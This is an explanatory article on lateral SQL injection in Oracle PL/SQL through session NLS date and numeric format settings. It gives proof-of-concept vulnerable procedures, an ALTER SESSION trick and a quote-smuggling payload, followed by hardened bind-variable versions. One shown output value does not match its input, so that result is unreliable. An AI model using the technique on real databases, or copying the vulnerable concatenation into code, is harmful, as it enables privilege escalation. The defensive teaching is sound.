If you execute static SQL directly or use bind parameters, you don't have to worry too much.
See the following Oracle stored procedure:
create or replace procedure kjdatepoc (d date)
as
begin
  -- static SQL: d is passed as a DATE value, never as text
  insert into kjdatetable values (d);
  commit;
end;
Here there is no need to worry about the new SQL injection attack. So where do DATE and NUMBER injections occur? Generally, where dynamic SQL is used without bind parameters,
for example the DBMS_SQL or EXECUTE IMMEDIATE that engineers often use.
See the following stored procedure:
create or replace procedure kjdatepoc (d date)
as
begin
  -- d is implicitly converted to text using the session's NLS_DATE_FORMAT
  execute immediate 'insert into kjdatetable values (' || d || ')';
  commit;
end;
In this case, changing the value of NLS_DATE_FORMAT in the session makes SQL injection possible inside the stored procedure or function.
The paper published abroad covers this in great detail, so I will not repeat it here.
However, it says little about NUMBER injection; it simply demonstrates that a single quote can be output.
See the following statements:
alter session set NLS_NUMERIC_CHARACTERS = '''.';
select to_number(1000.10001, '999999d9999999') || '' from dual;
Output result
1000'10001
Only one extra single quotation mark appears. What use is that? Be optimistic: it is very valuable in specific situations. Take a look at the next stored procedure:
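create or replace procedure NumInjPoc (kjexpnum number, kjexpstr varchar2)
is
  SecStr varchar2(1000);
begin
  -- escape single quotes in the string argument by doubling them
  SecStr := replace(kjexpstr, '''', '''''');
  -- kjexpnum is concatenated as text using the session's NLS_NUMERIC_CHARACTERS
  sys.dbms_output.put_line('select * from dual where id = ' || kjexpnum || ' and name = ''' || SecStr || '''');
end;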
The single quotes in the varchar2 argument are escaped internally. We can test it:
begin
  NumInjPoc(1000, '''--');
end;
The output SQL statement is
select * from dual where id = 1000 and name = '''--'
The single quotation mark is escaped.
So how can injection happen through the NUMBER parameter?
alter session set NLS_NUMERIC_CHARACTERS = '''.';
begin
  NumInjPoc(TO_NUMBER(0.10001, '9999d9999999'), '||kj.exp()--');
end;
Look at the output:
select * from dual where id = '2014 and name = '||kj.exp()--'
In this way, the procedure can be attacked indirectly.
To a certain extent, an attacker only needs ALTER SESSION to attack some functions or procedures in the system and escalate privileges. It is not a general way to break in, though: for SQL injection through a single statement, this method is of little use.
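Hardened counterparts of the two procedures above, as an added example that is not part of the original article. The `_safe` procedure names and the `kjnumtable` table are hypothetical, and `kjdatetable` is assumed to have a single DATE column.

```sql
-- Added example (not from the original article).
-- Assumed table for the NUMBER case; kjnumtable is a hypothetical name.
create table kjnumtable (id number, name varchar2(100));

-- 1. DATE: dynamic SQL is kept, but the value travels as a bind variable.
--    It is never converted to text, so NLS_DATE_FORMAT cannot alter the statement.
create or replace procedure kjdatepoc_safe (d date)
as
begin
  execute immediate 'insert into kjdatetable values (:1)' using d;
  commit;
end;
/

-- 2. NUMBER and VARCHAR2: both values are bound, so neither the session's
--    NLS_NUMERIC_CHARACTERS nor quotes in kjexpstr can reach the SQL text.
--    No manual replace() escaping is needed.
create or replace procedure NumInjPoc_safe (kjexpnum number, kjexpstr varchar2)
is
  cnt pls_integer;
begin
  execute immediate
    'select count(*) from kjnumtable where id = :n and name = :s'
    into cnt
    using kjexpnum, kjexpstr;
  sys.dbms_output.put_line('matching rows: ' || cnt);
end;
/

-- 3. Where a number really must be rendered as text (logging, generated
--    scripts), pin the decimal and group characters in the conversion itself
--    so the session setting is ignored for that call.
alter session set NLS_NUMERIC_CHARACTERS = '''.';
select to_char(1000.10001, '999999d9999999',
               'NLS_NUMERIC_CHARACTERS = ''.,''')
from dual;

-- Same call shape as the article's test; the arguments are now only data.
begin
  NumInjPoc_safe(TO_NUMBER(0.10001, '9999d9999999'), '||kj.exp()--');
end;
/
```

For code review, any `EXECUTE IMMEDIATE` or `DBMS_SQL` call that concatenates a DATE or NUMBER argument without an explicit format and NLS parameter deserves the same scrutiny as one that concatenates a string.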